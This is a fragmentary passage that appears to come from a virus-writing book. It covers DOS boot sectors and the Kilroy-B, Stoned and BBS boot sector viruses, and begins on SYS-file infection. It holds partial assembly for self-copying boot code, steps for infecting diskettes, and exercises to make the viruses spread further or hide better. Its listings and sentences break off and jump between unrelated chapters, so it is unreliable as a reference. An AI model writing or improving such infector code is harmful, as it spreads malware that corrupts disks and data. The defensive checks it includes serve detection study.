9.1. It consists of a total of 59 bytes of information, the last 24
having been added for DOS 6. Most of this information is required
in order for DOS and the BIOS to use the disk drive and it should
never be changed inadvertently. The exceptions are the DOS_ID
and the DISK_LABEL fields. They are simply names to identify
the boot sector and the disk, and can be anything you like.
Right after the jump instruction, the boot sector sets up the
stack. Next, it sets up the Disk Parameter Table, also known as the
Disk Base Table. This is just a table of parameters which the BIOS
uses to control the disk drive (Table 9.2) through the disk drive
controller (a chip on the controller card). More information on these
parameters can be found in Peter Norton’s Programmer’s Guide to
the IBM PC, and similar books. When the boot sector is loaded, the
BIOS has already set up a default table, and put a pointer to it at the
address 0000:0078H (the vector for Interrupt 1EH). The boot sector replaces
this table with its own, tailored for the particular disk. This is
standard practice, although in many cases the BIOS table is per-
fectly adequate to access the disk.
Offset Description
names stored in the boot record. Typical code for this whole
operation looks like this:
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;multiply by sectors per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat sector
PUSH AX
MOV WORD PTR [DOS_ID],AX ;root dir, save it
Once the boot sector has verified that the system files are on
disk, it tries to load the first file. It assumes that the first file is
located at the very start of the data area on disk, in one contiguous
block. So to load it, the boot sector calculates where the start of the
data area is,
First Data Sector = FRDS
+ [(32*ROOT_ENTRIES) + SEC_SIZE - 1]/SEC_SIZE
and the size of the file in sectors. The file size in bytes is stored at
offset 1CH from the start of the directory entry at 0000:0500H. The
number of sectors to load is
SIZE IN SECTORS = (SIZE_IN_BYTES/SEC_SIZE) + 1
The file is loaded at 0000:0700H. Then the boot sector sets up some
parameters for that system file in its registers, and transfers control
to it. From there the operating system takes over the computer, and
eventually the boot sector’s image in memory is overwritten by
other programs.
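The two formulas above are easy to check by hand. The following Python sketch simply restates them; the function names are ours, and the sample numbers assume a standard 360K floppy (two FATs of two sectors each, one reserved sector, no hidden sectors, 112 root directory entries).

```python
# Restatement of the two boot sector formulas above.
# Function names are hypothetical; SEC_SIZE and ROOT_ENTRIES follow the text.

SEC_SIZE = 512


def first_data_sector(frds: int, root_entries: int, sec_size: int = SEC_SIZE) -> int:
    """FRDS + [(32*ROOT_ENTRIES) + SEC_SIZE - 1]/SEC_SIZE, using integer division."""
    return frds + (32 * root_entries + sec_size - 1) // sec_size


def size_in_sectors(size_in_bytes: int, sec_size: int = SEC_SIZE) -> int:
    """(SIZE_IN_BYTES/SEC_SIZE) + 1, exactly as the boot sector computes it."""
    return size_in_bytes // sec_size + 1


# Assumed 360K floppy: the root directory starts at sector 2*2 + 0 + 1 = 5.
frds = 2 * 2 + 0 + 1
print(first_data_sector(frds, 112))   # root directory is 7 sectors long
print(size_in_sectors(40000))         # a 40000 byte file
print(size_in_sectors(1024))          # an exact multiple of the sector size
```

Note that the second formula always rounds up by adding one, so a file whose size is an exact multiple of the sector size is read with one spare sector. That is harmless here, since the boot sector only needs to be sure it loads enough.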
Note that the size of this file cannot exceed 7C00H - 0700H,
less a little to leave room for the stack. That’s about 29
kilobytes. If it’s bigger than that, it will run into the boot sector in
memory. Since that code is executing when the system file is being
loaded, overwriting it will crash the system. Now, if you look at the
size of IO.SYS in MS-DOS 6.2, you’ll find it’s over 40K long!
How, then, can the boot sector load it? One of the dirty little secrets
of DOS 5.0 and 6.X is that the boot sector does not load the entire
file! It just loads what’s needed for startup and then lets the system
file itself load the rest as needed.
Interrupt 13H
Since the boot sector is loaded and executed before DOS, none
of the usual DOS interrupt services are available to it. It cannot
simply call INT 21H to do file access, etc. Instead it must rely on
the services that the BIOS provides, which are set up by the ROM
startup routine. The most important of these services is Interrupt
13H, which allows programs access to the disk drives.
Interrupt 13H offers two services we will be interested in, and
they are accessed in about the same way. The Disk Read service is
specified by setting ah=2 when int 13H is called, and the Disk Write
service is specified by setting ah=3.
On a floppy disk or a hard disk, data is located by specifying
the Track (or Cylinder), the Head, and the Sector number of the
data. (See Figure 9.1). On floppy disks, the Track is a number from
0 to 39 or from 0 to 79, depending on the type of disk, and the Head
corresponds to which side of the floppy is to be used, either 0 or 1.
On hard disks, Cylinder numbers can run into the hundreds or
thousands, and the number of Heads is simply twice the number of
physical platters used in the disk drive. Sectors are chunks of data,
usually 512 bytes for PCs, that are stored on the disk. Typically
anywhere from 9 to 63 sectors can be stored on one track/head
combination.
[Figure 9.1: Tracks, sectors, and heads on a disk (Head 0, and Head 1 on the other side).]
To read sectors from a disk, or write them to a disk, one must
pass Interrupt 13H several parameters. First, one must set al equal
to the number of sectors to be read or written. Next, dl must be the
drive number (0=A:, 1=B:, 80H=C:, 81H=D:) to be accessed. The
dh register is used to specify the head number, while cl contains
the sector, and ch contains the track number. In the event there are
more than 256 tracks on the disk, the track number is broken down
into two parts, and the lower 8 bits are put in ch, and the upper two
bits are put in the high two bits of cl. This makes it possible to handle
up to 63 sectors per track (sector numbers start at 1) and 1024
cylinders on a hard disk. Finally, one
must use es:bx to specify the memory address of a buffer that will
receive data on a read, or supply data for a write. Thus, for example,
to read Cylinder 0, Head 0, Sector 1 on the A: floppy disk into a
buffer at ds:200H, one would code a call to int 13H as follows:
mov ax,201H ;read 1 sector
mov cx,1 ;Track 0, Sector 1
mov dx,0 ;Head 0, Drive 0
mov bx,200H ;buffer at offset 200H
push ds
pop es ;es=ds
int 13H
When Interrupt 13H returns, it uses the carry flag to specify whether
it worked or not. If the carry flag is set on return, something caused
the interrupt service routine to fail.
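The register layout is easier to see when the packing is written out. The Python sketch below shows how a cylinder, head, sector, and drive number map onto the cx and dx values passed to Interrupt 13H. The function name pack_chs is ours, and the sketch only computes register values; it does not touch a disk.

```python
# Packing a cylinder/head/sector address into the cx and dx register values
# used by the Interrupt 13H read and write services. Illustration only.

def pack_chs(cylinder: int, head: int, sector: int, drive: int) -> tuple[int, int]:
    """Return (cx, dx) for the given disk address."""
    if not 0 <= cylinder <= 1023:
        raise ValueError("cylinder must fit in 10 bits")
    if not 1 <= sector <= 63:
        raise ValueError("sector must be 1..63 (6 bits, numbered from 1)")
    if not 0 <= head <= 255 or not 0 <= drive <= 255:
        raise ValueError("head and drive must each fit in one byte")
    ch = cylinder & 0xFF                           # low 8 bits of the cylinder
    cl = (((cylinder >> 8) & 0x03) << 6) | sector  # high 2 bits, then the sector
    dh, dl = head, drive
    return (ch << 8) | cl, (dh << 8) | dl


print(pack_chs(0, 0, 1, 0))                               # the floppy read shown above
print(tuple(hex(v) for v in pack_chs(300, 1, 3, 0x80)))   # a hard disk address
```

The first call reproduces the cx=1, dx=0 values from the example above. The second shows cylinder 300 (12CH) split across ch and the top two bits of cl.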
file and it’s not there, displaying an error message. The result is
practically the same. Trimming the boot sector in this fashion
makes it necessary to search for only one file instead of two, and
saves about 30 bytes.
Finally, the BASIC.ASM program contains an important
mechanism that boot sector viruses need, even though it isn’t a
virus: a loader. A boot sector isn’t an ordinary program that you
can just load and run like an EXE or a COM file. Instead, it has to
be written to the proper location on the disk (Track 0, Head 0, Sector
1) in order to be useful. Yet when you assemble an ASM file, you
normally create either a COM or an EXE file. The loader bridges
this gap.
To make BASIC.ASM work, it should be assembled into a
COM file. The boot sector itself is located at offset 7C00H in this
COM file. That is done by simply placing an
ORG 7C00H
directive before the boot sector code. At the start of the COM file,
at the usual offset 100H, is located a small program which
1) Reads the boot sector from the disk in the A: drive into a data
area,
2) Copies the disk-specific data at the start of the boot sector into
the BASIC boot sector, and
3) Writes the resulting sector back out to the disk in drive A.
;This segment is where the first operating system file (IO.SYS) will be
;loaded and executed from. We don’t know (or care) what is there, as long as
;it will execute at 0070:0000H, but we do need the address to jump to defined
;in a separate segment so we can execute a far jump to it.
DOS_LOAD SEGMENT AT 0070H
ASSUME CS:DOS_LOAD
ORG 0
DOS_LOAD ENDS
;This is the loader for the boot sector. It writes the boot sector to
;the A: drive in the right place, after it has set up the basic disk
;parameters. The loader is what gets executed when this program is executed
;from DOS as a COM file.
ORG 100H
LOADER:
mov ax,201H ;load the existing boot sector
mov bx,OFFSET DISK_BUF ;into this buffer
mov cx,1 ;Drive 0, Track 0, Head 0, Sector 1
mov dx,0
int 13H
mov ax,201H ;try twice to compensate for disk
int 13H ;change errors
;This area is reserved for loading the boot sector from the disk which is going
;to be modified by the loader, as well as the first sector of the root dir,
;when checking for the existence of system files and loading the first system
;file. The location is fixed because this area is free at the time of the
;execution of the boot sector.
ORG 0500H
;Here is the start of the boot sector code. This is the chunk we will take out
;of the compiled COM file and put it in the first sector on a floppy disk.
ORG 7C00H
;Here we look at the first file on the disk to see if it is the first MS-DOS
;system file, IO.SYS.
LOOK_SYS:
MOV AL,BYTE PTR [FAT_COUNT] ;get fats per disk
XOR AH,AH
MUL WORD PTR [SECS_PER_FAT] ;mult by secs per fat
ADD AX,WORD PTR [HIDDEN_SECS] ;add hidden sectors
ADD AX,WORD PTR [FAT_START] ;add starting fat sector
PUSH AX ;start of root dir in ax
MOV BP,AX ;save it here
ORG 7DFEH
MAIN ENDS
END LOADER
ORG 100H
ORG 7C00H
TRIV_BOOT:
mov ax,0301H ;write one sector
mov bx,7C00H ;from here
mov cx,1 ;to Track 0, Sector 1, Head 0
mov dx,1 ;on the B: drive
int 13H ;do it
mov ax,0301H ;do it again to make sure it works
int 13H
ret ;and halt the system
END START
Testing Kilroy-B
Since Kilroy-B doesn’t touch hard disks, it is fairly easy to test
without infecting your hard disk. To test it, simply run KILROY.COM
with a bootable system disk in the A: drive to load the
virus into the boot sector on that floppy disk. Next, place a diskette
in both your A: and your B: drives, and then restart the computer.
By the time you get to the A: prompt, the B: drive will already have
been infected. You can check it with a sector editor such as that
provided by PC Tools or Norton Utilities, and you will see the
“Kilroy” name in the boot sector instead of the usual MS-DOS
name. The disk in B: can subsequently be put into A: and booted
to carry the infection on another generation.
If you don’t have something like Norton Utilities, two small
programs have been included on the diskette that comes with this
book. They are BOOTREAD and BOOTWRT. BOOTREAD will
read the boot sector on a diskette in the A: drive and save it to a file
named BOOT.SEC. Alternatively, BOOTWRT will write the boot
sector file BOOT.SEC to the boot sector of the diskette in drive A:.
These tools will make your exploration of boot sector viruses a bit
easier, but be careful not to write miscellaneous boot sectors on
Exercises
1. Write a COM program that will display your name and address. (Use
only BIOS calls!) Next, modify the BASIC boot sector to load and
execute your program. Put both on a disk and make this “operating
system” which you just designed boot successfully.
2. Modify the BASIC boot sector to display the address of the Interrupt
Service Routine for Interrupt 13H. This value is the original BIOS
vector. Next, modify the BASIC boot sector to check the Interrupt 13H
vector with the value your other modification displayed, and display a
warning if it changed. Though this is useless against Kilroy, this boot
sector is a valuable anti-virus tool which you may want to install in your
computer. We’ll discuss why in the next chapter.
3. Modify the Kilroy-B to search the entire root directory for IO.SYS and
IBMBIO.COM, rather than just looking at the first file.
One of the most successful computer viruses the world has ever
seen is the Stoned virus, and its many variants, which include the
infamous Michelangelo. Stoned is a very simple one sector boot
sector virus, but it has travelled all around the world and captured
headlines everywhere. At one time Stoned was so prevalent that the
National Computer Security Association reported that roughly one
out of every four virus infections involved some form of Stoned.1
At the same time, Stoned is really very simple. That just goes
to show that a virus need not be terribly complex to be successful.
In this chapter, we’ll examine a fairly straightforward variety
of the Stoned. It will introduce an entirely new technique for
infecting floppy disks, and also illustrate the basics of infecting the
hard disk.
[Figure: flowchart of the Stoned boot sequence, covering the hard disk or floppy test, the timed message display, the check of the hard disk master boot sector for an existing infection, and the jump to 0000:7C00H.]
0, Sector 1. The BIOS will then load the virus at startup and give it
control. The virus does its work, then loads the original boot sector,
which in turn loads the operating system. (See Figure 10.1)
This technique has the advantage of being somewhat operating
system independent. For example, the changes needed to accom-
modate a large IO.SYS would not affect a virus like this at all,
because it relies on the original boot sector to take care of these
details. On the other hand, an operating system that was radically
different from what the virus was designed for could still obviously
cause problems. The virus could easily end up putting the old boot
sector right in the middle of a system file, or something like that,
rather than putting it in an unoccupied area.
The Stoned virus always hides the original boot sector in Track
0, Head 1, Sector 3 on floppy disks, and Cylinder 0, Head 0, Sector
7 on hard disks. For floppy disks, this location corresponds to a
sector in the root directory. (Figure 10.2)
Note that hiding a boot sector in the root directory could
overwrite directory entries with boot sector code. Or the original
sector could subsequently be overwritten by directory information.
Stoned was obviously written for 5-1/4" 360 kilobyte diskettes,
because Track 0, Head 1, Sector 3 corresponds to the last root
directory sector on the disk. This leaves six sectors before it—or
room for about 96 entries before problems start showing up. It’s
probably a safe bet that you won’t find many 360K diskettes with
more than 96 files on them.
When one turns away from 360K floppies though, Stoned
becomes more of a nuisance. On 1.2 megabyte disks, Track 0, Head
1, Sector 3 corresponds to the third sector in the root directory. This
leaves room for only 32 files. On 1.44 megabyte disks, there is only
room for 16 files, and on 720K disks, only 64 files are able to coexist
with the virus.
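These figures can be verified from the standard DOS floppy layouts. The Python sketch below is a worked check, not part of any tool: the function name entries_before is ours, and the per-format values (sectors per track, sectors per FAT, root directory entries) are the usual DOS defaults, assumed here with one reserved sector and two FATs.

```python
import math

# How many root directory entries fit before Track 0, Head 1, Sector 3
# on each standard floppy format. Illustrative arithmetic only.

SEC_SIZE = 512
ENTRY_SIZE = 32   # bytes per root directory entry

# name: (sectors per track, sectors per FAT, root directory entries)
FORMATS = {
    "360K": (9, 2, 112),
    "720K": (9, 3, 112),
    "1.2M": (15, 7, 224),
    "1.44M": (18, 9, 224),
}


def entries_before(spt, secs_per_fat, root_entries,
                   head=1, sector=3, fats=2, reserved=1):
    """Directory entries stored ahead of the given Track 0 sector."""
    lba = head * spt + (sector - 1)               # zero-based sector number
    root_start = reserved + fats * secs_per_fat   # first root directory sector
    root_secs = math.ceil(root_entries * ENTRY_SIZE / SEC_SIZE)
    index = lba - root_start                      # position inside the root dir
    if not 0 <= index < root_secs:
        raise ValueError("sector is outside the root directory")
    return index * (SEC_SIZE // ENTRY_SIZE)


for name, (spt, spf, root) in FORMATS.items():
    print(name, entries_before(spt, spf, root))
```

Each sector holds 16 directory entries, so the result is just 16 times the number of root directory sectors that come before the sector in question.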
Memory Residence
Kilroy was not very infective because it could only infect a
single disk at boot time if there was a disk in drive B. A boot sector
virus would obviously be much more successful if it could infect
diskettes in either drive any time they were accessed, even if it were
hours after the machine was started. To accomplish such a feat, the
virus must install itself resident in memory.
[Figure 10.2: Layout of Track 0, Side 0 and Side 1, showing the boot sector, the two FATs, the root directory, and the first clusters, with the original boot sector stored in a root directory sector.]
then it calculates the segment where the start of the memory hole
is,
MOV CL,6 ;Convert mem size to segment
SHL AX,CL ;value
MOV ES,AX ;and put it in es
[Figure: memory map showing the operating system (IO.SYS), the Master Boot Sector, and the addresses 0700 and 0600.]
.model small
.code
;The loader is executed when this program is run from the DOS prompt. It
;reads the partition table and installs the Master Boot Sector to the C: drive.
ORG 100H
LOADER:
mov ax,201H ;read existing master boot sector
mov bx,OFFSET BUF
mov cx,1
mov dx,80H
int 13H
ORG 7C00H
BOOT:
cli
xor ax,ax ;set up segments and stack
mov ds,ax
mov es,ax
mov ss,ax
mov sp,OFFSET BOOT
sti
ACT_FOUND:
mov dl,al ;operating system found
lodsb ;set up registers to read its boot sector
mov dh,al
ORG 7DBEH
DB 55H,0AAH
END LOADER
To detect itself, Stoned merely checks the first four bytes of the
boot sector. Because of the way it’s coded, Stoned starts with a far
jump (0EAH), while ordinary operating system boot sectors start
with a short jump (0EBH) or a near jump (0E9H), and Master Boot
Sectors start with something entirely different. So a far jump is a
dead give-away that the virus is there.
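The same observation is useful from the defender's side when examining a boot sector image, such as a file saved with a sector editor. The Python sketch below is a rough illustration only: the function name classify_boot_sector is ours, it looks at nothing but the first opcode byte, and a real scanner would examine far more than that.

```python
# Classify a 512-byte boot sector image by its first opcode byte.
# A single-byte heuristic based on the observation above, nothing more.

FAR_JUMP = 0xEA     # jmp far ptr
SHORT_JUMP = 0xEB   # jmp short
NEAR_JUMP = 0xE9    # jmp near


def classify_boot_sector(sector: bytes) -> str:
    """Return a rough label for a boot sector image."""
    if len(sector) < 512:
        raise ValueError("expected at least one full 512-byte sector")
    first = sector[0]
    if first == FAR_JUMP:
        return "suspicious: starts with a far jump"
    if first in (SHORT_JUMP, NEAR_JUMP):
        return "typical operating system boot sector"
    return "other: possibly a master boot sector"


# Synthetic images for demonstration; only the first byte matters here.
dos_like = bytes([0xEB, 0x3C, 0x90]) + bytes(509)
far_jump = bytes([0xEA, 0x05, 0x00, 0xC0, 0x07]) + bytes(507)
print(classify_boot_sector(dos_like))
print(classify_boot_sector(far_jump))
```

A far jump by itself proves nothing, since any boot sector is free to start with one, so a result like this is a reason to look closer rather than a verdict.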
If not present, Stoned proceeds to copy the partition table to
itself2, and then write itself to disk at Cylinder 0, Head 0, Sector 1,
2 Note that Stoned needs a copy of the partition table even if its code never uses it.
That’s because the BIOS and DOS both look for the table in the Master Boot Sector.
If the Master Boot Sector (viral or not) didn’t have the table and you booted from the
A: drive, the C: drive would disappear. Furthermore, you couldn’t even boot from the
C: drive.
Offset Size Description
.
.
GOTO_BIOS:
.
.
JMP DWORD PTR CS:[OLD_INT13];Jump to old int 13
will allow an infection attempt only if the disk motor is off. Thus,
if you load a program like CALC.EXE, the virus will activate at
most once—when the first sector is read. This activity is almost
unnoticeable.
MESSAGE_DONE:
the start of the boot sector is at offset 0, rather than the usual 7C00H.
The far jump at the beginning of Stoned adjusts cs to 07C0H so that
the virus can execute properly with a starting offset 0. You’ll notice
that some of the data references after START3 have 7C00H added
to them. This is done because the data segment isn’t the same as
the code segment yet (ds=0 still). Once the virus jumps to high
memory, everything is in sync and data may be addressed normally.
Exercises
1. Modify Stoned so that it does not infect the hard disk at all. You may
find this modification useful for testing purposes in the rest of these
exercises, since you won’t have to clean up your hard disk every time
you run the virus.
3. Take out the motor status check in the Interrupt 13H handler, and then,
with the virus active, load a program from floppy. Take note of the
added disk activity while loading.
4. Rewrite Stoned so that it does not need a far jump at the start of its code.
5. Install the modified BASIC boot sector that examines the Interrupt 13H
vector which was discussed in Exercise 2 of the last chapter. Make sure
it works, and then infect this diskette with Stoned. Does the BASIC boot
sector now alert you that the Interrupt 13H vector has been modified?
Why? Can you see how this can be a useful anti-virus program?
Chapter 11
Advanced Boot
Sector Techniques
Source Code for this Chapter: \BBS\BBS.ASM
virus must first load the rest of itself into memory. Figure 11.1
explains this loading process.
Another important difference is that the BBS handles floppy
infections in a manner completely compatible with DOS. As you’ll
remember, the Stoned could run into problems if a root directory
had too many entries in it—a not uncommon occurrence for some
disk formats. The BBS, because it is larger, can use a technique
which will not potentially damage a disk.
[Figure 11.1: The BBS loading process. (A) The viral boot sector moves itself to high memory. (B) The viral boot sector loads the rest of the virus and the old boot sector. (C) The viral boot sector installs Int 13H and moves the old boot sector to 0000:7C00 to execute.]
0 is normally free, the virus can store up to 512 bytes times the
number of sectors in that cylinder.
At boot time, the BBS virus gets the size of conventional
memory from the BIOS data area at 0:413H, subtracts
(VIR_SIZE+3)/2=2 from it, then copies itself into high memory.
BBS adjusts the segment it uses for cs so that the viral Master Boot
Sector always executes at offset 7C00H whether it be in segment 0
or the high segment which BBS reserves for itself. (See Figure 11.1)
Once in high memory, the BBS Master Boot Sector loads the
rest of the virus and the original Master Boot Sector just below it,
from offset 7600H to 7BFFH. Then it hooks Interrupt 13H, moves
the original Master Boot Sector to 0:7C00H, and executes it.
Simple enough.
Typically, a disk will have two identical copies of the FAT table
(it’s important, so a backup made sense to the designers of DOS).
They are stored back-to-back right after the operating system boot
sector, and before the root directory. DOS uses two kinds of FATs,
12-bit and 16-bit, depending on the size of the disk. Windows 95
added a third kind of FAT, the 32-bit FAT. All of the standard
floppy formats use 12-bit FATs, while smaller hard disks use 16-bit
FATs. Larger hard disks use 32-bit FATs. The main criterion used
for choosing which to use is the size of the disk. A 12-bit FAT
allows about 4K entries, whereas a 16-bit FAT allows nearly 64K
entries. The 32-bit FAT uses 28 bits of each entry for the cluster
number, so it allows about 268 million entries. The more FAT
entries, the more clusters, and the more clusters, the smaller each
cluster will be. That’s important, because a cluster represents the
minimum storage space on a disk. If you have a 24 kilobyte cluster
size, then even a one byte file takes up 24K of space. At the small
end of the scale, however, a small FAT is advantageous because
the FAT table takes up less disk space.
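The trade-off between FAT width and wasted space is easy to check with a little arithmetic. The sketch below is only an illustration: the function names are my own, and it ignores the handful of entry values that DOS reserves for special markers.

```python
def max_fat_entries(bits):
    """Upper bound on the number of entries a FAT of this width can index."""
    return 2 ** bits


def slack_bytes(file_size, cluster_size):
    """Bytes allocated but unused when a file is stored in whole clusters."""
    if file_size == 0:
        return 0
    clusters = -(-file_size // cluster_size)  # ceiling division
    return clusters * cluster_size - file_size


if __name__ == "__main__":
    for bits in (12, 16):
        print(bits, "bit FAT:", max_fat_entries(bits), "entries at most")
    # A one-byte file on a disk with 1,024-byte (two-sector) clusters
    print("slack:", slack_bytes(1, 1024), "bytes")
```

The same slack_bytes() call with a larger cluster size shows why big clusters waste space on small files.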
Let’s consider the 12-bit FAT a little more carefully here. For
an example, let’s look at a 360K floppy. Clusters are two sectors,
and there are 354 of them (708 data sectors). The first FAT begins in Track 0, Head
0, Sector 2, and the second in Track 0, Head 0, Sector 4. Each FAT
is also two sectors long.
The first byte in the FAT identifies the disk type. A 360K disk
is identified with an 0FDH in this byte. The first valid entry in the
FAT is actually the third entry in a 12-bit FAT. Figure 11.2 dissects
a typical File Allocation Table.
Normally, when a diskette is formatted, the FORMAT program
verifies each track as it is formatted. If it has any trouble verifying
a cylinder, it marks the relevant cluster bad in the FAT using an
FF7 entry. DOS then avoids those clusters in every disk access. If
it did not, the disk drive would hang up on those sectors every time
something tried to access them, until the program accessing them
timed out. This is an annoying sequence of events you may some-
times experience with a disk that has some bad sectors on it that
went bad after it was formatted.
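To make the 12-bit packing concrete, here is a minimal read-only sketch that decodes FAT12 entries and counts free (000) and bad (FF7) clusters. The function names and the tiny sample table are made up for illustration; a real tool would read the FAT sectors from a disk image first. A count of bad clusters that grows on a diskette which otherwise reads cleanly is the sort of thing such a tool might flag.

```python
def fat12_entry(fat, n):
    """Return the 12-bit value of entry n from a raw FAT12 table."""
    offset = n + n // 2                      # each entry occupies 1.5 bytes
    pair = fat[offset] | (fat[offset + 1] << 8)
    return pair >> 4 if n & 1 else pair & 0x0FFF


def count_free_and_bad(fat, cluster_count):
    """Count free and bad clusters; data clusters start at entry 2."""
    free = bad = 0
    for n in range(2, cluster_count + 2):
        value = fat12_entry(fat, n)
        if value == 0x000:
            free += 1
        elif value == 0xFF7:
            bad += 1
    return free, bad


if __name__ == "__main__":
    # Hypothetical table: media byte 0FDH, then entries 2..5 = 003, FF7, 000, FFF
    sample = bytes([0xFD, 0xFF, 0xFF, 0x03, 0x70, 0xFF, 0x00, 0xF0, 0xFF])
    print("media byte: %02X" % sample[0])
    print("free, bad:", count_free_and_bad(sample, 4))
```

Note that entries 0 and 1 hold the media byte and filler, which is why the first valid entry is the third one.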
When infecting a floppy disk, the BBS virus first searches the
FAT to find some sectors that are currently not in use on the disk.
Then it marks these sectors, where it hides its code, as bad even
though they really aren’t. That way, DOS will no longer access
them. Thus, the BBS virus won’t interfere with DOS, though it will
call INIT_FAT_MANAGER
mov cx,VIR_SIZE+1
call FIND_FREE
jc EXIT
mov dx,cx
mov cx,VIR_SIZE+1
call MARK_CLUSTERS
call UPDATE_FAT_SECTOR
With FATs properly marked, the virus need only write itself to
disk. But where? To find out, the virus calls one more FAT-
[Figure: disk layout. Labels: Viral Boot Sector, FAT, Root Directory, Orig Boot Sector, Marked Bad.]
Self-Detection
To avoid doubly-infecting a diskette (which, incidentally,
would not be fatal) or a hard disk (which would be fatal), BBS reads
the boot sector on the disk it wants to infect and compares the first
30 bytes of code with itself. These 30 bytes start after the data area
in the boot sector at the label BOOT. If they are the same, then the
virus is safe in assuming that it has already infected the disk, and it
need not re-infect it.
Compatibility
In theory, the BBS virus will be compatible with any FAT-
based floppy disk and any hard disk.
In designing any virus that hides at the top of conventional
memory and hooks Interrupt 13H, one must pay some attention to
what will happen when advanced operating systems like Windows
95 or Windows NT load into memory. These operating systems
typically do not use the BIOS to access the disk. Rather, they have
installable device drivers that do all of the low-level I/O and
interface with the hardware. Typically, a virus like BBS will simply
get bypassed when such an operating system is loaded. It will be
active until the device driver is loaded, and then it sits there in limbo,
unable to infect any more floppy disks, because Interrupt 13H never
gets called.
[Figure: flowchart. Decision boxes: Head 0?, Track 0?, Hard Disk?, Sector 1?, Is Disk Infected? Action boxes: Read Boot Sector, Infect Disk, Pass control to ROM BIOS.]
Windows 95, however, has what is called a compatibility mode.
This mode continues to use Interrupt 13H to access a disk. If
Windows can’t get at the original ROM BIOS Interrupt 13H vector
(such as when a boot sector virus has hooked that vector) it will go
into compatibility mode. This politely allows the virus to continue
in operation.
Another thing that Windows 95 does is notice that the Master
Boot Record on the disk it is starting up from has changed. It then
displays the message:
Warning: Your computer may have a virus. The Master Boot Record on your
computer has been modified. Would you like to see more information about this
problem?
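The idea behind a warning like this, noticing that a boot record no longer matches a known-good copy, can be sketched in a few lines. This is not how Windows 95 implements its check (the text does not say); it is a minimal illustration that assumes the 512-byte sector has already been read into memory, for example from a disk image. The function names are hypothetical.

```python
import hashlib

SECTOR_SIZE = 512


def boot_sector_digest(sector):
    """Return a SHA-256 hex digest of a 512-byte boot sector."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("expected exactly 512 bytes")
    return hashlib.sha256(sector).hexdigest()


def has_boot_signature(sector):
    """True if the sector ends with the standard 55H AAH boot signature."""
    return sector[510:512] == b"\x55\xAA"


def boot_sector_changed(sector, baseline_digest):
    """Compare a sector against a digest recorded when the disk was known good."""
    return boot_sector_digest(sector) != baseline_digest


if __name__ == "__main__":
    known_good = bytes(510) + b"\x55\xAA"      # stand-in for a real boot record
    baseline = boot_sector_digest(known_good)
    altered = b"\xEB" + known_good[1:]         # same sector with one byte changed
    print("unchanged flagged:", boot_sector_changed(known_good, baseline))
    print("altered flagged:  ", boot_sector_changed(altered, baseline))
```

The baseline has to be recorded while the disk is known to be clean, and kept somewhere the boot record cannot influence.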
The Loader
The BBS virus as presented on the diskette with this book
compiles to a COM file which can be executed directly from DOS.
When executed from DOS, the loader simply calls the
INFECT_FLOPPY routine, which proceeds to infect the diskette in
drive A: and then exits.
Exercises
1. Rather than looking for any free space on disk, redesign BBS to save
the body of its code in a fixed location on the disk, provided it is not
occupied.
2. Rather than hiding where normal data goes, a virus can put its body in
a non-standard area on the disk that’s not even supposed to be there.
For example, on many 360K floppy drives, the drive is physically
capable of accessing Track 40, even though it’s not a legal value.
Modify the BBS to attempt to format Track 40 using Interrupt 13H,
Function 5. If successful, store the body of the virus there and don’t
touch the FAT. Since DOS never touches Track 40, the virus will be
perfectly safe there. Another option is that many Double Sided, Double
Density diskettes can be formatted with 10 sectors per track instead of
nine. You can read the 9 existing sectors in, format with 10 sectors,
write the 9 back out, and use the tenth for the virus. To do this, you’ll
need to fool with the inter-sector spacing a bit.
COM, EXE and boot sector viruses are not the only possibilities
for DOS executables. One could also infect SYS files.
Although infecting SYS files is perhaps not that important a
vector for propagating viruses, simply because people don’t share
SYS files the way they do COMs, EXEs and disks, I hope this
exercise will be helpful in opening your mind up to the possibilities
open to viruses. And certainly there are more than a few viruses out
there that do infect device drivers already.
Let’s tackle this problem from a little bit different angle:
suppose you are a virus writer for the U.S. Army, and you’re given
the task of creating a SYS-infecting virus, because the enemy’s
anti-virus has a weakness in this area. How would you go about
tackling this job?
1 Refer to the Resources section at the end of this book for information on how to get
plugged into this network.
2 Note that newer versions of DOS also support a device driver format that looks more
like an EXE file, with an EXE-style header on it. We will not discuss this type of
driver here.
;DEVICE.ASM is a simple device driver to illustrate the structure of
;a device driver. All it does is announce its presence when loaded.
.model tiny
.code
ORG 0
HEADER:
dd -1 ;Link to next device driver
dw 0C840H ;Device attribute word
dw OFFSET STRAT ;Pointer to strategy routine
dw OFFSET INTR ;Pointer to interrupt routine
db 'DEVICE  ' ;Device name (padded with blanks to 8 bytes)
;This is the strategy routine. Typically it just takes the value passed to it
;in es:bx and stores it at RHPTR for use by the INTR procedure. This value is
;the pointer to the request header, which the device uses to determine what is
;being asked of it.
STRAT:
mov WORD PTR cs:[RHPTR],bx
mov WORD PTR cs:[RHPTR+2],es
retf
;This is the interrupt routine. It’s called by DOS to tell the device driver
;to do something. Typical calls include reading or writing to a device,
;opening it, closing it, etc.
INTR:
push bx
push si
push di
push ds
push es
push cs
pop ds
les di,[RHPTR] ;es:di points to request header
mov al,es:[di+2] ;get command number
INTRX: pop es
pop ds
pop di
pop si
pop bx
retf
END STRAT
10 8 Device name.
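The header at the top of DEVICE.ASM is 18 bytes long: a 4-byte link, a 2-byte attribute word, two 2-byte routine pointers, and the 8-byte name at offset 10. As a rough sketch of how one might inspect that header in a SYS file, the following unpacks those fields. The function name and the sample offsets are hypothetical, and the only attribute bit decoded is bit 15, which marks a character device.

```python
import struct

HEADER_FORMAT = "<IHHH8s"   # link, attribute, strategy, interrupt, name
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)


def parse_device_header(data):
    """Unpack the DOS device driver header at the start of a SYS image."""
    if len(data) < HEADER_SIZE:
        raise ValueError("file too short to hold a device header")
    link, attr, strat, intr, name = struct.unpack_from(HEADER_FORMAT, data, 0)
    return {
        "is_last": link == 0xFFFFFFFF,        # dd -1 in the listing
        "attribute": attr,
        "is_char_device": bool(attr & 0x8000),
        "strategy": strat,                    # offset of STRAT
        "interrupt": intr,                    # offset of INTR
        "name": name.decode("ascii", "replace").rstrip(),
    }


if __name__ == "__main__":
    # Made-up routine offsets; a real file supplies its own.
    raw = struct.pack(HEADER_FORMAT, 0xFFFFFFFF, 0xC840, 0x0012, 0x001D,
                      b"DEVICE  ")
    for key, value in parse_device_header(raw).items():
        print(key, "=", value)
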